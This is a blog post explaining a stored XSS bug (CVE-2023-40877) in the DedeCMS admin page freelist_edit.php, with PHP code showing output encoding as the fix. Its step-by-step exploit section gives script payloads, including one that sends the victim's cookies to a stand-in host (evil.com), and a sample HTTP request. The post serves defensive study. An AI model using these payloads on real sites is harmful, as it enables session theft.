DedeCMS is one of China’s most widely used open-source content management systems. If your site relies on it, you might be at risk from a Cross-Site Scripting (XSS) vulnerability found in version 5.7.110 and below, cataloged as CVE-2023-40877. This post breaks down the bug, walks through an exploit example in plain terms, and offers guidance on staying safe.

What is CVE-2023-40877?

This XSS flaw exists because DedeCMS fails to HTML-encode user-supplied input in the title parameter of the /dede/freelist_edit.php page before echoing it back into the page. Because the title is saved and rendered again later, this is a stored XSS: an attacker can inject JavaScript once, and it will execute in the browser of anyone who later views the malicious entry.

Reference:
- NVD CVE Detail
- Exploit Database

An attacker who can run script in a victim’s browser can, for example, steal session cookies or redirect users elsewhere, all without needing deep access to your web server.

Where’s the Vulnerability?

In DedeCMS 5.7.110 and earlier, when you add or edit a freelist (under /dede/freelist_edit.php), the title field is not escaped for its HTML attribute context. That means user input is written directly into the HTML, unencoded.

Inside /dede/freelist_edit.php, the vulnerable part looks approximately like this:

<input name="title" id="title" value="<?php echo $row['title']; ?>" class="input-text" />

If someone submits a title like this:

"><script>alert('XSS')</script>

it is inserted into the HTML as-is. The leading `">` closes the value attribute and the input tag, so the `<script>` that follows is parsed as a real element, and the JavaScript alert pops up.
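To make the mechanism concrete, here is an added example (not DedeCMS’s own code) that renders the title the way the vulnerable template does and next to it with proper output encoding, then parses both results the way a browser would to confirm which one keeps the title inside the attribute. The function names and the inline `$row` array are assumptions constructed for this illustration; the payload is the one from this post.

```php
<?php
// Added example (not DedeCMS code): the vulnerable echo from freelist_edit.php next to a
// hardened version, plus a parser-based check that the title survives the round trip intact.
// Function names and the sample $row array are assumptions constructed for this illustration.

// Mirrors the vulnerable template: the stored title goes straight into an HTML attribute.
function renderTitleInputVulnerable(array $row): string
{
    return '<input name="title" id="title" value="' . $row['title'] . '" class="input-text" />';
}

// Hardened form: encode for the HTML attribute context at output time.
// ENT_QUOTES turns both " and ' into entities (the payload needs a raw " to close the attribute);
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string, which would
// otherwise blank the field silently.
function renderTitleInputSafe(array $row): string
{
    $title = htmlspecialchars((string) $row['title'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="title" id="title" value="' . $title . '" class="input-text" />';
}

// Parse the rendered fragment the way a browser would and verify that (a) the input's value
// attribute decodes back to exactly the stored title and (b) no <script> element was created.
function titleRoundTripsSafely(string $html, string $storedTitle): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // the vulnerable markup is malformed; do not spam warnings
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $xpath = new DOMXPath($doc);
    $input = $xpath->query('//input[@name="title"]')->item(0);
    $scriptCount = $doc->getElementsByTagName('script')->length;

    return $input !== null
        && $input->getAttribute('value') === $storedTitle
        && $scriptCount === 0;
}

// Constructed sample row using the same payload as the post.
$payload = '"><script>alert(\'XSS\')</script>';
$row = ['title' => $payload];

foreach (['vulnerable' => 'renderTitleInputVulnerable', 'safe' => 'renderTitleInputSafe'] as $label => $fn) {
    $html = $fn($row);
    printf("%-12s %s\n", $label . ':', $html);
    printf("%-12s round trip intact = %s\n\n", '', titleRoundTripsSafely($html, $payload) ? 'yes' : 'no');
}
```

Run it with the PHP CLI (the DOM extension it uses is bundled with PHP). The vulnerable rendering yields an empty value attribute plus a live script element, so the check reports the round trip as broken; the encoded rendering decodes back to the original title with no script element. The point worth keeping in mind is that the fix belongs at output time: filtering the title on save does not help if the same row can be written through another path, and encoding at the point of echo protects every path.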

Step-by-Step Exploit

> Warning: This example is for educational and defensive use only!

Let’s see how an attacker could pull this off.

1. Log in as a user with access to /dede/freelist_edit.php

2. Go to /dede/freelist_edit.php and set the title to this payload:

"><script>alert('XSS')</script>

3. Save, then preview or view the entry

As soon as the page loads with the tainted title, your browser will execute the JavaScript, displaying an alert box. A more malicious actor could do something like:

"><script>document.location='http://evil.com/steal?cookie='+document.cookie</script>

which would send the victim’s cookies to an attacker’s server (any cookie not flagged HttpOnly, since document.cookie cannot read those).

Here's how a typical request might look:

POST /dede/freelist_edit.php?action=save HTTP/1.1
Host: yoursite.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xxxx

id=1&title=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&...

When reopening or previewing the freelist, the script runs.

Demo GIF

*(Imagine a GIF here showing the alert box firing as soon as the freelist page is viewed!)*

Upgrade DedeCMS

Always run the latest version. Patch notes are available on the official DedeCMS site.


Restrict Admin Access

Make sure only trusted users can log in to /dede. XSS is especially dangerous in admin panels, because a script running there inherits the administrator’s session and privileges.

- August 2023: CVE-2023-40877 published (NVD entry dated 08/24/2023).
- Current: Exploit code published on Exploit-DB.

Check your DedeCMS version today.

For more info, see the official advisory and proof-of-concept exploit:
- CVE-2023-40877 on NVD
- Exploit-DB #51616

Timeline

Published on: 08/24/2023 15:15:07 UTC
Last modified on: 08/25/2023 13:20:20 UTC